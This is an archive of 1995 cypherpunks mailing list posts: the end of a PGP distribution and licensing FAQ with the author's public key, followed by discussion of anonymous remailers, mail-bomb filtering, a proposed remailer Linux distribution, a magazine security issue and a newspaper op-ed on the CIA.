ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip * _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip Spanish * _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz * _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz Swedish * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt MAILINGLISTE FUER PGP UND VERWANDTES (PGP MAILING LIST IN GERMAN) Die Listenadresse: pgp-friends at fiction.pb.owl.de Die *Request*adresse (fuer subscribe/unsubscribe und andere Administra- tiva): pgp-friends-request at fiction.pb.owl.de WHAT IS ALL THIS NONSENSE ABOUT EXPORT CONTROLS? For a detailed rant, get ftp://ftp.csn.net/mpj/cryptusa.zip WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN THE USA? MIT PGP is only for personal, noncommercial use because of restrictions on the licensing of both the RSA algorithm (attached to RSAREF) and the IDEA algorithm. PKP/RSADSI insist that we use RSAREF instead of the mpi library for reasons that make sense to them. For commercial use, use Viacrypt PGP, which is fully licensed to use both the RSA and IDEA algorithms in commercial and corporate environments (as well as personal use, of course). Another restriction is due to an exclusive marketing agreement between Philip Zimmermann and Viacrypt that applies to the USA and Canada only. Viacrypt has exclusive rights to market PGP commercialy in this area of the world. This means that if you want to market PGP commercially in competition with Viacrypt in the USA or Canada, you would have to create a new implementation of the functions of PGP containing none of Philip Zimmermann's copyrighted code. You are free to modify existing PGP code for your own use, as long as you don't sell it. Phil would also appreciate your checking with him before you distribute any modified versions of PGP as freeware. "PGP", "Pretty Good Privacy" and "Phil's Pretty Good Software" are trademarks owned by Philip Zimmermann. This means that if you modify an older version of PGP that was issued under the copyleft license and distribute it without Phil's permission, you have to call it something else. This avoids confusing all of us and protects Phil's good name. WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN CANADA? MIT PGP is only for noncommercial use because of restrictions on the licensing of the IDEA algorithm. Because the RSA algorithm isn't patented in Canada, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license associated with the RSAREF copyright, which is valid in Canada. For commercial use, use Viacrypt PGP, which is fully licensed to use the IDEA algorithm in commercial and corporate environments. The exclusive marketing agreement with Viacrypt also applies in Canada. See the section on USA intellectual property restrictions for more details. WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST OUTSIDE NORTH AMERICA? MIT PGP is only for noncommercial in areas where there is a patent on software implementations of the IDEA algorithm. Because the RSA algorithm isn't patented outside of the USA, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license restrictions. The RSAREF copyright holds outside of the USA, even though the RSA patent does not. The IDEA conventional block cipher is covered by US Patent 5,214,703 and European patent EP 0 482 154 B1. IDEA is a trademark of Ascom-Tech AG. Commercial users of IDEA (including commercial use of PGP) may obtain licensing details from Ph. Baumann, IDEA Lizenz Ascom Tech AG Postfach 151 CH-4502 Solothurn Switzerland Tel ++41 65 242828, Fax ++41 65 242847. WHAT IS COMMERCIAL USE? Use some common sense. If you are running a business and using PGP to protect credit card numbers sent to you electronically, then you are using PGP commercially. Your customers, however, need not buy the commercial version of PGP just to buy something from you, if that is the only commercial use they make of PGP (since they are spending, not making, money with PGP). If you are just encrypting love letters or other personal mail (for which you don't get paid) on your own personal computer, that is not commercial. If you are encrypting official business mail on your for-profit corporation's computer with PGP, that is commercial use. Note that there are some gray areas not covered above, and the patent owners of RSA and IDEA may differ from my interpretation in the areas not covered above, so if you are in doubt, you should consider the licensing of Viacrypt PGP (or outside of North America, direct licensing of IDEA) to be cheap legal insurance. Indeed, the license fee is probably a lot cheaper than a legal opinion from a lawyer qualified to make such a judgement. Note that I am not a lawyer and the above is not legal advise. Use it at your own risk. ARE MY KEYS COMPATIBLE WITH THE OTHER PGP VERSIONS? If your RSA key modulus length is less than or equal to 1024 bits (I don't recommend less, unless you have a really slow computer and little patience), and if your key was generated in the PKCS format, then it will work with any of the current PGP versions (MIT PGP 2.6, PGP 2.6ui, or Viacrypt PGP 2.7). If this is not the case, you really should generate a new key that qualifies. MIT PGP 2.6.2 should be able to use 2048 bit keys. Generation of 2048 bit keys was supposed to automatically be enabled in PGP 2.6.2 in December, 1994, but a bug caused the actual key limit to be 2047 bits. MORE WORLD WIDE WEB URLs http://draco.centerline.com:8080/~franl/pgp/pgp-mac-faq-hinely.html http://draco.centerline.com:8080/~franl/pgp/pgp.html http://draco.centerline.com:8080/~franl/crypto/cryptography.html http://www.pegasus.esprit.ec.org/people/arne/pgp.html http://rschp2.anu.edu.au:8080/crypt.html http://ibd.ar.com/PublicKeys.html http://www.ifi.uio.no/~staalesc/PGPversions.html WINDOWS SHELLS Several shells for running PGP with Microsoft Windows are available at the same places PGP can be found. MACPGP KIT ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx BUGS See the documentation that comes with PGP in the latest versions for bugs in the older versions. The latest versions of PGP may not fully wipe all traces of plain text from a file when given the -w option. For more information, see http://www.mit.edu:8001/people/warlord/pgp-faq.html BETSI - BELLCORE'S TRUSTED SOFTWARE INTEGRITY SYSTEM For information on this service, send mail to certify at bellcore.com with the subject help, or check http://info.bellcore.com/BETSI/betsi.html INTEGRATING PGP AND PINE Send blank e-mail to slutsky at lipschitz.sfasu.edu with Subject: mkpgp to get a c-shell script to interface PGP and Pine. Send a second message with Subject: addtomkpgplist if you want updates sent you automatically. HOW DO I PUBLISH MY PGP PUBLIC KEY? There are lots of ways. One way is to use a key server. Send mail to one of these addresses with the single word "help" in the subject line to find out how to use a key server. pgp-public-keys at pgp.iastate.edu pgp-public-keys at pgp.mit.edu pgp-public-keys at pgp.ai.mit.edu public-key-server at pgp.ai.mit.edu pgp-public-keys at cs.tamu.edu pgp-public-keys at chao.sw.oz.au pgp-public-keys at jpunix.com pgp-public-keys at dsi.unimi.it pgp-public-keys at kiae.su pgp-public-keys at fbihh.informatik.uni-hamburg.de There is also an experimental public key server at http://ibd.ar.com/PublicKeys.html There is an excellent commercial key certification and publication service, too. For $20/year or so, you can have your key officially certified and published in a "clean" key database that is much less susceptible to denial-of-service attacks than the other key servers. People need not pay any fees to retrieve keys so published. Send mail to info-pgp at Four11.com for information, or look at http://www.Four11.com/ You can also mail your key to pgp-public-keys at c2.org, and it will be posted to the subscribers of that mailing list, sent to the keyservers, and posted to alt.security.keydist. To subscribe to the mailing list, send a message to majordomo at c2.org with "subscribe pgp-public-keys" in the body of the message. Another way is to upload it to the PGP public keys area of the Colorado Catacombs BBS (303-772-1062). Another way is to just send it to your correspondents. You could add it to your .plan file so that finger returns your key. You could add it to some of your postings. No matter which way you do it, you should have your key signed by someone who verifies that your key belongs to you, so that you don't have someone else generating a key that has your name on it, but that isn't yours. Here is my public key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.7 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 =htAN - -----END PGP PUBLIC KEY BLOCK----- TIME STAMP SERVICES Mail sent to Time S. Tamp will be returned, signed with its own private key. REPRODUCING THIS FAQ Permission is granted to distribute unmodified copies of this FAQ. To get the latest version of this FAQ, get ftp://ftp.netcom.com/pub/mp/mpj/getpgp.asc or send mail to ftp-request at netcom.com with the line SEND mp/mpj/getpgp.asc in the body of the message, or send blank mail to mpjohnso at nyx.cs.du.edu. This FAQ is also archived at rtfm.mit.edu with a very long file name. There are many other frequently asked questions. Most of them are covered in the documentation that comes with PGP or in one of the books about PGP. Send corrections to mpj at netcom.com. I regret that I lost some of the corrections people sent me on the last round of this FAQ, so if I missed yours, please send it again. Thanks. ___________________________________________________________ |\ /| | | | | \/ |o| | Michael Paul Johnson Colorado Catacombs BBS 303-772-1062 | | | | / _ | mpj at csn.org aka mpj at netcom.com m.p.johnson at ieee.org | | |||/ /_\ | ftp://ftp.csn.net/mpj/README.MPJ CIS: 71331,2332 | | |||\ ( | ftp://ftp.netcom.com/pub/mp/mpj/README -. --- ----- .... | | ||| \ \_/ |___________________________________________________________| -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAgUBLxvrHPX0zg8FAL9FAQHz9AQAjdyLzJ2L+PSkqL0nZ4ULiq4ReHdYfLrX DlBvkM9JG0jCgpDmcWkWg4IEUwJ8VoKnjFYaUgbw3CkCoIZYRekXrUkRgoZSq5TV BdADxEXJabF7It3e6jH2ICVNSYdsfe/4xh+8F7v7CKzSZubtwaLOIbZ+CSBVi3D0 3iyn6+zrZVo= =5zak -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Thu Jan 19 08:20:17 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 19 Jan 95 08:20:17 PST Subject: internet mag Message-ID: <199501191620.IAA22714@jobe.shell.portal.com> This month's issue of Internet World Magazine deals primarily with internet security. I'm am not going to review everything in the mag but I'll list the table of content: Better Safe: Danger lurks on the Info Highway. You must take precaution to reduce your riks. By Dave Taylor and Rosalind Resnick Getting Cryptic: Phil Zimmermann's PGP gives you powerful encryption to keep your messages safe from prying eyes. Read all about it. By William Stalling. (Introductory article about PGP. Nothing we, here, don't already know) Securing the Enterprise: Connectiong your corporation to the Internet can be a security nightmare. Firewalls are the main line of defense. By Alton Hoover (An overview of Firewalls, application-layer gateways and token-based authentication schemes) Beyond the Firewall: The latest firewall technology not only detects intruders, but strikes back. By Winn Schwartau (Very interesting article. Here are some quotes to wet your appetite: Wouldn't it be nice if a computer system attacked from the Internet responded to the attack by striking back at the intruder? This is exactly what Sidewinder's implementation of type enforcement does.....It will detect the intrusion immediately....As soon as a violation occurs, a silent alarm is activated....sidewinder can be configured to react in any number of ways, once an attack has been detected...it can shut the intruder cold...(or)...it can invoke a mechanism that would record all the information from whence came the attack....By luring the attacker into a false sense of security, the hacker would continue trying to break in, unaware that every step was being recorded... Cashing In: As Internet commerce expands, a host of companies are vying to establish their system as the basis for cyberbanking and credit-card transactions. By Lisa Morgan Business Browser: New versions of Mosaic with built-in encryption promise to keep your transactions safe. By Richard W. Wiggins Unlawful Entry Crackers can feasts on your data if you fail to plug your leaky Unix system By Aaron Weiss (Five Ways to crack a Unix System) It's Alive: Although the furor has subsided, reports of Clipper's death are greatly exaggerated. The government's controversial eavesdropping effort lives on. By Steven Vaughan-Nichols Building Trust The chief executives of Trusted Information Systems -Steve Crocker and Steve Walker- talk about encryption, CyberCash, Clipper, and more. By Jeff Ubois. All in all a rather interesting mag. Check it out. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ wizard at alpha.c2.org Give me the liberty to know, to utter, and to argue freely according to conscience, above all liberties. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From pcw at access.digex.com Thu Jan 19 08:39:36 1995 From: pcw at access.digex.com (Peter Wayner) Date: Thu, 19 Jan 95 08:39:36 PST Subject: Anonyous Cash through Options Trading Message-ID: Several months ago, there was a discussion at length about how one could use the futures and options markets to transfer funds anonymously. This week's edition of Forbes magazine (Jan 30, 95) has the headline, "OIL! GUNS! GREED! Was Chase Manhattan ripped off by arms traffickers?" In the story, Forbes guesses that some suspiciously large losses in the options market could have been a smoke screen for money laundering: Oil traders do big business in unlisted options, providing a further smoke screen. Perkins points to deals in which Harris would buy a put option on a cargo of crude from a friendly counterpart like Bayoil and resell a similar contract in the oil market. If oil prices climbed, the put would expire worthless and Bayoil would pocket the price of the option, while Arochem would break even. If oil prices dropped, and the ultimate buyer exercised the put, Arochem could absorb the loss while conveniently neglecting to exercise its put against Bayoil, Perkins theorizes. (pg 87) From jalicqui at prairienet.org Thu Jan 19 08:45:58 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Thu, 19 Jan 95 08:45:58 PST Subject: JP vs Homer Message-ID: <9501191645.AA26767@firefly.prairienet.org> > We are capable of controlling mail bombs, for instance, in the >following way: > > Take an incoming message, capture From: line. Strip header. MD5 body. >Add to sorted table [From: MD5(message) date]. Check for repetition of >first two fields. If reps = 1, forward message. If reps = 2, send message >to From: "Possible error. Two copies of message received." If >reps = 0 mod 5, send letter to postmaster at From:. "Possible mailbomb or >spam. copies of received from at your site in the >past week." Clear table of entries more than a week old every midnight. > > > If all remailers did this, then no matter where the net was entered, >the messages would be rejected. And spammers/bombers would be spamming/ >bombing their own postmaster. Probably a bad idea. If not all did it, >then add special handling to hit remailer-operator at . This would encourage >the operator to auto-magically handle the spam-bomb himself. This works only if one assumes that the exact same message is posted using the exact same path. Granted, it would probably be effective for novice spammers. Consider a premail/chain type script and a cleartext spam message. The script is executed once every five minutes, say. When it runs, it creates a new random path through the remailers, adding encryption wrappers for each hop. Your spam detector would miss this one completely unless your remailer was used as the terminal remailer for a significant number of spams. More significantly, the MD5 hashes of each message would be different even if the same path were used more than once because the PGP session key would be different (again, unless your remailer would be the terminal remailer in the particular path that repeated). From jya at pipeline.com Thu Jan 19 09:09:32 1995 From: jya at pipeline.com (John Young) Date: Thu, 19 Jan 95 09:09:32 PST Subject: WSJ on CIA Dump Message-ID: <199501191708.MAA20858@pipe4.pipeline.com> The Wall Street Journal January 18, 1995, p. A14. Get Smart -- Eliminate the CIA By Angelo Codevilla Over the past several years, U.S. intelligence agencies in general and the CIA in particular have proved themselves incompetent in peacetime and of little use in conflict. Stripped of their mystique and lacking the capacity to reform themselves, these organizations are virtually in receivership. The maladies ailing the intelligence community are numerous. Independent quality control was never more than a pretense, and competition among intelligence agencies was nonexistent. Producers of intelligence -- rather than the soldiers and diplomats who have to use it -- have also become its judges. All this has spawned a complex of habits, procedures, mentalities and people too entrenched to be repaired and too noxious for any part to form the nucleus of a new, healthy system. Hence, we should take Sen. Daniel Patrick Moynihan's advice, and rethink our intelligence from the ground up. A good place to start is with the fact that about half of the $28 billion U.S. intelligence budget pays for units directly controlled by military commanders, which routinely provide precise information for the armed forces' operations close to the front lines. The Treasury and State Departments also have their own intelligence units, which fit their needs quite well. So why do we need a national system headed by the CIA? The original justification for the creation of the CIA in 1947 was that intelligence would be best if its gathering and evaluation were divorced as much as possible from the operating departments of government -- State, Defense, etc. -- and placed under the president. This judgment has turned out to be wrong. Because presidents have relied on the CIA to run the system, the result has been a system dominated by the priorities of the producers -- not the users -- of intelligence. A basic failing is that the CIA has primary responsibility for intelligence and none at all for real world events. The CIA prefers to place its career employees in U.S. embassies, where they pretend to be employees of other parts of the government. Such "case officers" must acknowledge that they are gathering information for the U.S. Another disadvantage is that they don't speak foreign languages well. And unlike successful reporters, they virtually never know the substantive fields about which they are seeking information. Thus it is unsurprising that they are usually outdone in economic reporting by economic reporters, in military reporting by military reporters, and so forth. The Aldrich Ames case shows how much more highly the CIA values the smooth functioning of its system than what the system produces. Mr. Ames handed the KGB the capacity to shape the intelligence flowing to top U.S. officials during the endgame of the Cold War. Thus disinformation made presidents and secretaries of state more vulnerable to Gorbomania than the average citizen informed by newspaper accounts. How could the CIA fail to notice the fishiness of reports generated by a network controlled by the other side? The same way that, in the 1970s and 1980s, the agency had failed to notice that it was passing along reports from a network of agents in Cuba totally controlled by Castro's DGI, and from a network in East Germany all but a few of whose agents were working for the Stasi. In other words, while the Ames case was unusually destructive, it was a typical example of bureaucratic sclerosis. In the Gulf War, intelligence worsened the farther one got away from the front lines. The national system headed by the CIA misperceived the nature of Saddam Hussein's regime, failed to grasp the obvious signs of attack, and has yet to learn Saddam's military and political reasoning. Our imaging satellites failed to find mobile Scud launchers, and our communications intelligence antennas failed to shed light on the diplomatic intercourse between Saddam and the Soviets. National analysts misjudged Iraq's nuclear program, and were fooled by elementary camouflage. Gen. H. Norman Schwarzkopf's public belittling of CIA-run intelligence was matched by unprintable epithets from field commanders. What happened in the Gulf would have happened in any conflict because the intelligence community's cameras and antennas were conceived, and its people trained, on the CIA's assumption that cooperative competition with the Soviet Union would last forever and that the basic designs of weapons would not change. Thus cameras, for example, were optimized to take pictures of fixed installations rather than to keep track of attacking military forces or mobile missile launchers. Long before the Soviet collapse, however, it had become clear that the CIA made bad bets. The age of mobile missiles arrived long ago, and modern weapons are defined by the software they contain rather than by observable features. So what's the point of, for example, analyzing a radar signal that a computer can change in an instant? Divorce from operational responsibility also tends to make the reports that flow to top officials less valuable than the information used to compile them. (In any given subject, the CIA delivers a consensus of the system's several agencies. It takes far more time for a paper to go through the interagency process than for someone to write the paper. Considering the elementary errors and ignorance that often come out, it is clear that the conferees do not spend much time fact-checking. Intelligence analysts become spin doctors, concerned not with facts but with pushing policy makers in the direction of their parent agencies' prejudices. Hence the ultimate irony: A system whose ostensible reason for being was to eliminate from intelligence the parochial interests of tank drivers, diplomats, bomber pilots, etc. ended up aggregating the prejudices of the analysts -- prejudices unrelieved by the sobering prospect of having to carry out the policies they are pushing for. The CIA has maintained a monopoly on judging the quality of the system's operations and products. It does not heed presidents, much less their appointees. A decade ago, the agency ignored President Reagan's executive order to reorganize counterintelligence. Two decades ago, President Ford, shocked by how far intelligence estimates were diverging from reality, asked a group of distinguished outsiders (the B team) to see whether the intelligence community's data on Soviet nuclear forces could support conclusions different from those of the insider analysts. The B Team, despite resistance from the agency, came up with results far superior to the insider A Team's. A better intelligence system should be built on a model radically different from the 1947 original. Each of the major departments of the U.S. government (State, Defense, etc.) should be responsible for gathering and evaluating the information it needs to operate in the new world disorder. Intelligence, in short, should be franchised out to its consumers. There is reason to believe that the departments would do better without the ClA's tutelage than with it. In the past, the armed forces have asked to deploy officers who speak foreign languages, who could blend in with the local population, and who would be experts in the military fields on which they were reporting. U.S. military leaders have also clamored for satellites whose products they could use. Each time, the CIA made sure such requests were denied. If those requests had been granted, the country would be better informed. In all this there is a need for some central coordination. The several agencies have to mesh their quest for agents abroad, lest they stumble over each other. The information that any part of the government collects must be available to properly cleared people in all other parts, so that any and all analysis can be based on all the facts. Fortunately, maintaining a central registry nowadays requires computers, rather than the bureaucratic monster that arose a half century ago. Finally the president of the United States' own intelligence needs should be provided by his own staff. Among its duties should be to make sure that all the agencies get each others' estimates. The availability to the president and other top decision makers of contrasting estimates from through out the government would stimulate better performance all around. So, while there is a role for a central intelligence agency in a system based on consumer sovereignty, there is none for the CIA. Mr. Codevilla, a fellow at the Hoover Institution, is the author of "Informing Statecraft" (Free Press, 1992). End From jya at pipeline.com Thu Jan 19 09:13:29 1995 From: jya at pipeline.com (John Young) Date: Thu, 19 Jan 95 09:13:29 PST Subject: BYTE on PGP WoT Message-ID: <199501191712.MAA21219@pipe4.pipeline.com> William Stallings writes in the BYTE February issue on "The PGP Web of Trust." From jalicqui at prairienet.org Thu Jan 19 09:17:01 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Thu, 19 Jan 95 09:17:01 PST Subject: The Remailer Crisis Message-ID: <9501191716.AA08891@firefly.prairienet.org> >For example, the Linux mavens could tell us if Linux-based remailer >boxes could be hung on dedicated connections to The Little Garden >network, as a specific example. A "black box remailer" such as several >folks have suggested (Chaum (in 1981), me, Eric Hughes, others) might be >buildable for under a grand. We could ask here for contributions, and >might even raise this amount of money. Then each of us who contributed >could have "accounts," maybe several of them. Imagine 100 or more >"remailers" all on this one machine--I'm deliberately ignoring the >security issue for now. Little Garden has stated categorically that >they will not tell users what they can or can't do with their machines >(though I can think of some cases where they might have to, as with >spamming, etc.). Anyway, you can see where I'm headed. The "Linux mavens" followed by the "black box" stuff sparked an idea... First, before delving into dreamland: I'm sure Linux could be hung off just about any store-and-forward (a la UUCP) or TCP/IP-based network there is with a minimum of trouble. Linux junkies are familiar with the concept of "distributions". For the uninitiated, Linux itself is just a kernel; Linus Torvalds doesn't hold anyone's hand when it comes to actually turning that kernel into a working system. As a result, people have done this job themselves: they build their own working systems painstakingly from scratch and then archive it off to disk or CD-ROM, which they sell or give away. Most of the time, when you get Linux, you're actually getting one of these "distributions" of Linux, complete with all the frills that don't come with the kernel (like the shell, basic utils, and so on). Now how 'bout this: Consider a new distribution of Linux, the "Cypherpunk" distribution (if ya don't like the name, make up yer own!). This would be a bare minimum of a distribution, with nothing fancy: bash, misc. utils like ls, etc. This can fit (tightly) in 20 MB. The supplied kernel would have every networking option under the sun turned on, but would be otherwise bare of frills as well. Now let's add minimal network utils (telnet and telnetd for connecting and sendmail for obvious reasons), perl, PGP, and a remailer package. To make it as easy as possible, I'd use the UMSDOS filesystem, so that Linux could be installed on a DOS machine without any reformatting, repartitioning, or similar headaches. We could make this available via FTP or press some CD-ROMs if we were ambitious. Better yet, the cool Linux thing to do now is to install via NFS; this makes installing Linux as easy as sticking in a boot disk and pointing the install program at the NFS server (well, not quite, but pretty close). After adding in the cute little install program (like the Slackware distribution already has) and some boot options, you'd have an "instant remailer" software package, able to transform any 386SX/4MB RAM DOS machine or better into a Linux-based remailer site, complete with aliases, logging policies, etc. already configured for you. I bet even Tim May could install this if it were done right. :-) So, am I dreaming, or does this sound viable to y'all? From tcmay at netcom.com Thu Jan 19 10:51:01 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 19 Jan 95 10:51:01 PST Subject: The Remailer Crisis In-Reply-To: <9501191716.AA08891@firefly.prairienet.org> Message-ID: <199501191847.KAA28985@netcom15.netcom.com> Jeff's response is exactly what I was hoping for! The "Cypherpunks distribution" version of Linux would be a great way to spread cheap remailer technology on cheap Linux boxes. Hell, I might even augment my Macs with one of these things! Jeff Licquia wrote: > The "Linux mavens" followed by the "black box" stuff sparked an idea... > > First, before delving into dreamland: I'm sure Linux could be hung off just > about any store-and-forward (a la UUCP) or TCP/IP-based network there is > with a minimum of trouble. This is what I'd expect....I just don't know the details. > Now how 'bout this: Consider a new distribution of Linux, the "Cypherpunk" > distribution (if ya don't like the name, make up yer own!). This would be a > bare minimum of a distribution, with nothing fancy: bash, misc. utils like > ls, etc. This can fit (tightly) in 20 MB. The supplied kernel would have > every networking option under the sun turned on, but would be otherwise bare > of frills as well. Now let's add minimal network utils (telnet and telnetd > for connecting and sendmail for obvious reasons), perl, PGP, and a remailer > package. To make it as easy as possible, I'd use the UMSDOS filesystem, so > that Linux could be installed on a DOS machine without any reformatting, > repartitioning, or similar headaches. A great idea. This could be the "remailer in a box" we've been talking about for a long time. Could also include a package of security and crypto utilities, etc. Sort of what the "Gnu" folks might do if they were involved in crypto. (By "involved in crypto" I mean of course Cypherpunks sorts of concerns, which Stallman seems to have not much interest in, at least publically.) > We could make this available via FTP or press some CD-ROMs if we were > ambitious. Better yet, the cool Linux thing to do now is to install via NFS; > this makes installing Linux as easy as sticking in a boot disk and pointing > the install program at the NFS server (well, not quite, but pretty close). > After adding in the cute little install program (like the Slackware > distribution already has) and some boot options, you'd have an "instant > remailer" software package, able to transform any 386SX/4MB RAM DOS machine > or better into a Linux-based remailer site, complete with aliases, logging > policies, etc. already configured for you. I bet even Tim May could install > this if it were done right. :-) Well, if I take the other side of the bet, that I *can't*, is that kosher? > So, am I dreaming, or does this sound viable to y'all? Sounds very good to me. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From perry at imsi.com Thu Jan 19 11:14:28 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 19 Jan 95 11:14:28 PST Subject: (none) In-Reply-To: <199501181607.IAA08201@largo.remailer.net> Message-ID: <9501191913.AA04532@snark.imsi.com> Eric Hughes says: > Why sendmail doesn't have anti-spam protection at this point is beyond > me. Denial of email service to one user should not deny service to > all others. I consider broken any email system that crashes a machine > because of a disk partition filling. As a mail administrator for many years, I've never seen a site crash because of a filling disk partition due to mail overload. I've seen Sendmail shut itself down temporarily, but thats to be expected. As for the question of mail overload for one user harming the others, its a design decision. The only alternative is to produce quotas for mail delivery, which at most of the places I run would be a very bad thing. Strictly speaking, sendmail has nothing to do with local delivery and isn't in a position to do any of this anyway -- but its easy enough to change the local mailer (which is not part of sendmail) to do quotas if you like. Perry From xpat at vm1.spcs.umn.edu Thu Jan 19 11:24:54 1995 From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu) Date: Thu, 19 Jan 95 11:24:54 PST Subject: Remailer-on-a-CD Message-ID: <9501191924.AA17670@toad.com> >The "Linux mavens" followed by the "black box" stuff sparked an idea... >package. To make it as easy as possible, I'd use the UMSDOS filesystem so >that Linux could be installed on a DOS machine without any reformatting >repartitioning, or similar headaches. >distribution already has) and some boot options, you'd have an "instant >remailer" software package, able to transform any 386SX/4MB RAM DOS macine >or better into a Linux-based remailer site, complete with aliases, loggng >So, am I dreaming, or does this sound viable to y'all? OK, let's ponder the minimum hardware necessary, possible minimal configuration (Intel/clone based): (1) Case. (2) Power supply. (3) Motherboard/CPU and 4mb RAM. (4) Hard drive w/ controller. (5) modem card. (5) No 